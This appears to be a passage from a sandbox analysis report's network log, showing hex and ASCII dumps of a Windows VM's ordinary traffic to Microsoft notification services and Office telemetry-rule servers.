2024-11-13 19:39:20 UTC	11412	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.5	49722	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:20 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6a 35 72 2f 74 6b 71 48 42 6b 65 42 62 51 52 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 64 63 66 30 61 31 30 66 65 33 64 66 36 37 33 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: j5r/tkqHBkeBbQRg.1Context: 9dcf0a10fe3df673
2024-11-13 19:39:20 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-13 19:39:20 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6a 35 72 2f 74 6b 71 48 42 6b 65 42 62 51 52 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 64 63 66 30 61 31 30 66 65 33 64 66 36 37 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 44 41 46 67 32 4e 6c 74 7a 37 71 76 6d 39 30 2b 79 79 77 72 36 4d 4c 35 48 6a 54 67 34 50 70 45 64 39 52 56 37 45 75 39 66 50 61 57 36 6b 6b 58 55 38 76 4c 59 75 59 33 68 4f 6b 56 34 63 4f 70 33 38 53 39 75 71 5a 43 54 67 49 65 2f 30 54 34 69 42 51 62 42 6b 4f 41 58 69 67 63 71 67 59 79 4c 75 76 39 4c 76 63 68 42 2b 78 2f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: j5r/tkqHBkeBbQRg.2Context: 9dcf0a10fe3df673<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZDAFg2Nltz7qvm90+yywr6ML5HjTg4PpEd9RV7Eu9fPaW6kkXU8vLYuY3hOkV4cOp38S9uqZCTgIe/0T4iBQbBkOAXigcqgYyLuv9LvchB+x/
2024-11-13 19:39:20 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6a 35 72 2f 74 6b 71 48 42 6b 65 42 62 51 52 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 64 63 66 30 61 31 30 66 65 33 64 66 36 37 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: j5r/tkqHBkeBbQRg.3Context: 9dcf0a10fe3df673<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-13 19:39:20 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-13 19:39:20 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 42 78 74 4f 55 48 74 4b 56 45 57 39 46 71 2f 53 49 39 78 63 65 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: BxtOUHtKVEW9Fq/SI9xcew.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.5	49723	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:22 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:23 UTC	471	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:22 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Mon, 11 Nov 2024 13:19:38 GMT ETag: "0x8DD02537E74B538" x-ms-request-id: a1588731-601e-000d-094b-342618000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193922Z-1749fc9bdbdjgplnhC1DFWhrks00000001c0000000007vgc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:23 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-13 19:39:23 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.5	49728	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:24 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:24 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:24 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: f8aed360-a01e-0032-69a0-341949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193924Z-1749fc9bdbdnkwnnhC1DFWud0400000001e000000000a30p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:24 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.5	49724	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:24 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:24 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:24 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193924Z-16547b76f7fcrtpchC1DFW52e80000000hm000000000mf4n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:24 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.5	49727	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:24 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:24 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:24 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 537f77db-e01e-0085-2863-35c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193924Z-r178fb8d7657mv58hC1DFW03nw00000001ag00000000gu6v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
